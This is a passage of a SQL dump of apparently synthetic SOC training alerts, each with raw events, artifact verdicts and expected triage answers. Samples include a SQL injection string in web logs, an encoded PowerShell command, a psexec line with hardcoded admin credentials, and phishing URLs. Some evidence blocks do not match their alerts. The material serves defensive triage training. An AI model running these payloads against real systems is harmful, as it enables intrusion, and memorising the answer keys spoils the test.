NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.035Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.20\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.035Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.20\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.035Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.20\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.035Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.20\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.035Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.20\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1703, 'Abnormal Internal Traffic with Base64 Encoded Payload', 'medium', 'SentinelOne', 'Observed unusual internal traffic with a Base64 encoded payload. Further investigation revealed routine data transfer.', 'Data Exfiltration', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:10:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"172.16.0.10\",\"dst_ip\":\"172.16.0.15\",\"username\":\"mwhite\",\"hostname\":\"data-node\",\"request_body\":\"VGhpcyBpcyBhIHJvdXRpbmUgZGF0YSB0cmFuc2Zlci4=\"}', '2026-03-15 19:47:07', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"172.16.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"VGhpcyBpcyBhIHJvdXRpbmUgZGF0YSB0cmFuc2Zlci4=\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Payload is part of a routine data transfer\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The traffic and encoded payload were initially suspicious but were confirmed to be part of routine operations.\"}', 'Intermediate', 'EDR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.038Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:10:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"172.16.0.10\\\",\\\"dst_ip\\\":\\\"172.16.0.15\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"data-node\\\",\\\"request_body\\\":\\\"VGhpcyBpcyBhIHJvdXRpbmUgZGF0YSB0cmFuc2Zlci4=\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.038Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:10:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"172.16.0.10\\\",\\\"dst_ip\\\":\\\"172.16.0.15\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"data-node\\\",\\\"request_body\\\":\\\"VGhpcyBpcyBhIHJvdXRpbmUgZGF0YSB0cmFuc2Zlci4=\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.038Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:10:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"172.16.0.10\\\",\\\"dst_ip\\\":\\\"172.16.0.15\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"data-node\\\",\\\"request_body\\\":\\\"VGhpcyBpcyBhIHJvdXRpbmUgZGF0YSB0cmFuc2Zlci4=\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.038Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:10:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"172.16.0.10\\\",\\\"dst_ip\\\":\\\"172.16.0.15\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"data-node\\\",\\\"request_body\\\":\\\"VGhpcyBpcyBhIHJvdXRpbmUgZGF0YSB0cmFuc2Zlci4=\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.038Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:10:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"172.16.0.10\\\",\\\"dst_ip\\\":\\\"172.16.0.15\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"data-node\\\",\\\"request_body\\\":\\\"VGhpcyBpcyBhIHJvdXRpbmUgZGF0YSB0cmFuc2Zlci4=\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1704, 'PowerShell Download Cradle Detected', 'critical', 'CrowdStrike', 'A PowerShell download cradle was detected executing an encoded script on an internal host. This indicates potential malware delivery or execution.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:25:14Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"CORP-PC-01\",\"command_line\":\"powershell.exe -EncodedCommand ZQBjAGgAbwAgACcASABlAGwAbABvACcA\"}', '2026-03-15 19:47:41', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand ZQBjAGgAbwAgACcASABlAGwAbABvACcA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command execution indicating potential malware activity\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell encoded command indicates a likely malware execution attempt, requiring immediate isolation and investigation.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1705, 'Process Hollowing Detected in Explorer.exe', 'high', 'SentinelOne', 'Anomalous process behavior detected. Explorer.exe is exhibiting process hollowing behavior, which is commonly associated with malware.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T06:50:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.12\",\"dst_ip\":\"\",\"username\":\"asmith\",\"hostname\":\"WORKSTATION-22\",\"command_line\":\"explorer.exe\",\"file_hash\":\"3e2fbf5c0d8b1c8c9f4e4a8a2f3d9b8c\"}', '2026-03-15 19:47:41', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3e2fbf5c0d8b1c8c9f4e4a8a2f3d9b8c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious process hollowing activity\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The hash and process behavior are indicative of process hollowing, a technique used by malware to hide malicious activity.\"}', 'Intermediate', 'EDR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"WORKSTATION-22\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"3e2fbf5c0d8b1c8c9f4e4a8a2f3d9b8c\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"WORKSTATION-22\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"3e2fbf5c0d8b1c8c9f4e4a8a2f3d9b8c\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"WORKSTATION-22\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"3e2fbf5c0d8b1c8c9f4e4a8a2f3d9b8c\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"WORKSTATION-22\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"3e2fbf5c0d8b1c8c9f4e4a8a2f3d9b8c\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.042Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:50:32Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"WORKSTATION-22\\\",\\\"command_line\\\":\\\"explorer.exe\\\",\\\"file_hash\\\":\\\"3e2fbf5c0d8b1c8c9f4e4a8a2f3d9b8c\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1706, 'Suspicious PowerShell Execution', 'medium', 'Carbon Black', 'A PowerShell script executed with suspicious parameters, potentially indicating an attempt to download or execute unauthorized content.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:15:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"\",\"username\":\"mbrown\",\"hostname\":\"DEV-SERVER-01\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File script.ps1\"}', '2026-03-15 19:47:41', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the development server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -ExecutionPolicy Bypass -File script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Execution with bypass policy is suspicious but common in legitimate scripts\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution policy bypass is common during legitimate script testing on development servers.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.043Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"DEV-SERVER-01\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File script.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.043Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"DEV-SERVER-01\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File script.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.043Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"DEV-SERVER-01\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File script.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.043Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"DEV-SERVER-01\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File script.ps1\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.043Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"mbrown\\\",\\\"hostname\\\":\\\"DEV-SERVER-01\\\",\\\"command_line\\\":\\\"powershell.exe -ExecutionPolicy Bypass -File script.ps1\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1707, 'Web Request with SQL Injection Payload', 'critical', 'Sysmon', 'Detected an incoming web request containing a SQL injection payload targeting a vulnerable URL.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:05:22Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.20\",\"username\":\"\",\"hostname\":\"\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-03-15 19:47:41', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for web attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted web server\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"patch_vulnerability\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The SQL injection payload indicates a direct attempt to exploit database vulnerabilities, requiring immediate intervention.\"}', 'Intermediate', 'EDR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.044Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:22Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.044Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:22Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.044Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:22Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.044Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:22Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.044Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:05:22Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1708, 'Unusual Internal Lateral Movement Detected', 'high', 'CrowdStrike', 'Detected lateral movement within the network using PSExec, possibly indicating a compromised internal account.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-03-14T23:30:12Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.35\",\"dst_ip\":\"192.168.1.40\",\"username\":\"jdoe\",\"hostname\":\"CORP-SRV-03\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.40 -u admin -p password cmd\"}', '2026-03-15 19:47:41', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.35\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the source machine initiating PSExec\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the targeted machine\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.40 -u admin -p password cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Use of PSExec with hardcoded credentials indicating potential lateral movement\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec with hardcoded credentials for lateral movement is a strong indicator of malicious internal activity.\"}', 'Intermediate', 'EDR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1709, 'Malicious Email URL Detected', 'medium', 'Proofpoint', 'An email was received containing a URL known to host phishing content, targeting the recipient to steal credentials.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:45:11Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.0.2.45\",\"dst_ip\":\"\",\"username\":\"j.smith@example.com\",\"hostname\":\"\",\"email_sender\":\"fraudulent@phishingsite.com\",\"url\":\"http://malicious-url.com/login\"}', '2026-03-15 19:47:41', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"fraudulent@phishingsite.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email address associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-url.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL 